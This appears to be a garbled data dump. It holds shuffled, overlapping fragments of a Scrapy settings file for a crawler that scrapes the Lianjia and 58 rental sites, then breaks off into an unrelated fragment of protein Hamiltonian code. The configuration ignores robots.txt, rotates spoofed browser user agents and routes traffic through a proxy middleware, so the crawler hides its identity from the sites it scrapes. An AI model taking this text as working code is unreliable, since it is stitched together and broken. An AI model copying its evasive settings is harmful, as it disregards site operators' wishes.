None, 不会存储到 ES ELASTIC_HOSTS = [ {'host':", "Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; ' '.NET CLR 3.0.04506)',", "= '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable and configure the AutoThrottle extension (disabled", "lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, },", "' USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser;", "9200}, ] REDIS_HOST = 'redis' # 默认为 None, 不会去重 REDIS_PORT = 6379 #", ".NET CLR 2.0.50727; Media Center PC 5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible;", "= False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED =", "CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET", "400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable and configure the", "fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1", "DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None,", "7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR", "AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U;", "3.5.30729; .NET CLR ' '3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0", "CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET", "默认为 None, 不会存储到 ES ELASTIC_HOSTS = [ {'host': 'elastic', 'port': 9200}, ] REDIS_HOST", "AutoThrottle extension 
(disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The", "AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0", "'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET", "Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11", "] REDIS_HOST = 'redis' # 默认为 None, 不会去重 REDIS_PORT = 6379 # 默认", "Scrapy should be sending in parallel to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY =", "} ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, }", "NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE", "MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; '", "'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline':", "Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR ' '3.0.30729; .NET CLR 2.0.50727;", "en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like", "# ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS = [ {'host': 'elastic',", "Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux", "= 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS =", "Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US) 
AppleWebKit/527+", "2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;", "'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686; en-US;", "' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible;", "DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES", "each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing throttling stats for every", "'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U;", "Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML,", "See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The initial download delay AUTOTHROTTLE_START_DELAY = 10", "CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo", "X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS =", "100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = {", ".NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322;", "CLR ' '3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE", "= 10 # The maximum download delay to be set in case of", "= 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',", "'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 
Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT", "NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR ' '3.0.30729; .NET", "1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR", "http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The initial download delay AUTOTHROTTLE_START_DELAY = 10 #", "delay to be set in case of high latencies AUTOTHROTTLE_MAX_DELAY = 10 #", "IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable and configure the AutoThrottle extension", "(KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8;", "NT 5.1; .NET CLR 1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE", "' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52',", "'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } # ES 节点, 可以配置多个节点(集群), 默认为", "stats for every response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES =", "'2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE", "remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing throttling stats for every response", "Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko)", "2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN)", "'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR", "Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko", "= 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML,", ".NET CLR ' '3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (compatible;", "Windows NT 
5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;)", "Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',", "1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows", "download delay to be set in case of high latencies AUTOTHROTTLE_MAX_DELAY = 10", "rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko)", ".NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows;", "= ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X", "(KHTML, like Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux;", "InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15", "' \\ 'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT", ") ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False", "OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel", "Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U;", "1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language':", "30 RETRY_TIMES = 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS = { 'lianjia': { 'cities':", "(Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 ('", "X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac", "CLR 3.5.30729; .NET CLR 
3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible;", "{ 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } # ES 节点, 可以配置多个节点(集群),", "RETRY_TIMES = 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS = { 'lianjia': { 'cities': lianjia.cities,", "MEDIA_ALLOW_REDIRECTS = True # Enable and configure the AutoThrottle extension (disabled by default)", "MSIE 9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;", "} DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware':", "the AutoThrottle extension (disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True #", "6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; ' '.NET", "'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR", "'elastic', 'port': 9200}, ] REDIS_HOST = 'redis' # 默认为 None, 不会去重 REDIS_PORT =", "AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS", "a58 BOT_NAME = 'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders'", "False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES = { }", "like Gecko) Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE", "Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh;", "Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 
10_13_4) AppleWebKit/605.1.15 (KHTML, like", "zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0", "latencies AUTOTHROTTLE_MAX_DELAY = 10 # The average number of requests Scrapy should be", "4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows;", "PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2;", "( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322;", "NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)',", "= False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', }", "be set in case of high latencies AUTOTHROTTLE_MAX_DELAY = 10 # The average", "# Enable and configure the AutoThrottle extension (disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html", "'.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0", "Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56", "(compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR", "5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0", "{ } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None,", "'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable and configure", "= 30 RETRY_TIMES = 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS = { 'lianjia': {", 
"3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET", "lianjia, a58 BOT_NAME = 'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE =", "Gecko) Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE 6.0;", "Media Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64;", "10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac OS", "Trident/4.0; SLCC2; .NET CLR 2.0.50727; ' '.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET", "'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline':", "OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS", "U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6',", "throttling stats for every response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES", "Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh;", "of requests Scrapy should be sending in parallel to # each remote server", "(Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows", "COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh;", "(Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15',", "(X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8)", "= { } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware':", "= 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1", "NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; '", "maximum download delay to be set in case of high latencies AUTOTHROTTLE_MAX_DELAY =", "AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS X", "6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR ' '3.0.30729; .NET CLR", "AUTOTHROTTLE_ENABLED = True # The initial download delay AUTOTHROTTLE_START_DELAY = 10 # The", "delay AUTOTHROTTLE_START_DELAY = 10 # The maximum download delay to be set in", "NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)',", "U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686;", "'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS", "False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES", "100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS =", "(' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko,", "2.0.50727)', 
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR", "X 10.6.8; U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10", "None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400,", "= ( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR", "# The average number of requests Scrapy should be sending in parallel to", "a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } # ES 节点, 可以配置多个节点(集群), 默认为 None,", "MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET", "Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; ' '.NET CLR", "zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11;", "'58': { 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } # ES 节点,", "Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows", "U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64)", "} IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable and configure the AutoThrottle", "LOG_LEVEL = 'INFO' SPIDER_SETTINGS = { 'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map':", "5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0", "2.0 # Enable showing throttling stats for every response received: AUTOTHROTTLE_DEBUG = True", "' '3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0;", "Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52', ) 
ROBOTSTXT_OBEY = False", "ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED", "# See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The initial download delay AUTOTHROTTLE_START_DELAY =", "<gh_stars>100-1000 # -*- coding: utf-8 -*- from house_renting.spider_settings import lianjia, a58 BOT_NAME =", "NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0;", "COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en',", "}, '58': { 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } # ES", "= 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS = { 'lianjia': { 'cities': lianjia.cities, 'available_cities':" ]
[ "(1-q_j) * (1-q_k) def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks", "the nonsensical string 000.\"\"\" return (1-q_i) * (1-q_j) * (1-q_k) def circuit_011(self, q_i,", "r in range(maximum)]) for k in ['y', 'z']]) return prefactor * \\ (", "j, 'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j,", "if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r", "= self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i))) sum_string", "sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_z(self,", "range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t", "for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in", "a_y(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j,", ".qlogic import * from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def", "for t in range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1))", "checks the nonsensical string 000.\"\"\" return (1-q_i) * (1-q_j) * (1-q_k) def circuit_011(self,", "moves in the direction y-.\"\"\" return q_i * q_j * (1-q_k) def circuit_zp(self,", "qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for k", "1 if the chain moves in the direction x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self,", "sympy as sp import symengine as se from abc import * from tqdm", "#self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self, k): \"\"\"Access the kth bit", "(1-q_j) * q_k def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns", 
"(1-q_i) * q_j * q_k def sum_string(self, i, j, k): \"\"\"Computes the sum", "* self.steric_term() self.expr += self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self,", "from .qlogic import * from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True", "self.back_term() if self.dim == 3: self.expr += (self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1)", "import * from tqdm import tqdm, trange from copy import deepcopy from itertools", "ss_fmat='babej'): \"\"\"Encapsulates the expression and methods of a protein hamiltonian of the \"turn", "= [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z-':", "def interaction_term_ij(self, i, j): return -1 * self.int_mat[i, j] * (self.a_x(i, j) +", "term that penalises meaningless residue bitstrings 000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1),", "in chain(range(n_layers), reversed(range(n_layers-1))): if t % 2 == 0: iterator = range(0, t+1,", "sumstring['y-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r", "self.naas)]) for i in range(self.naas)]) def a_x(self, i, j): sumstring = { 'x+':", "Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression", "returns 1 if the chain moves in the direction z+.\"\"\" return (1-q_i) *", "def build_exp(self): self.expr = (self.naas+1) * self.back_term() if self.dim == 3: self.expr +=", "return qand([q_i, q_j]), qxor(q_i, q_j) @property @abstractmethod def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D", "self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * 
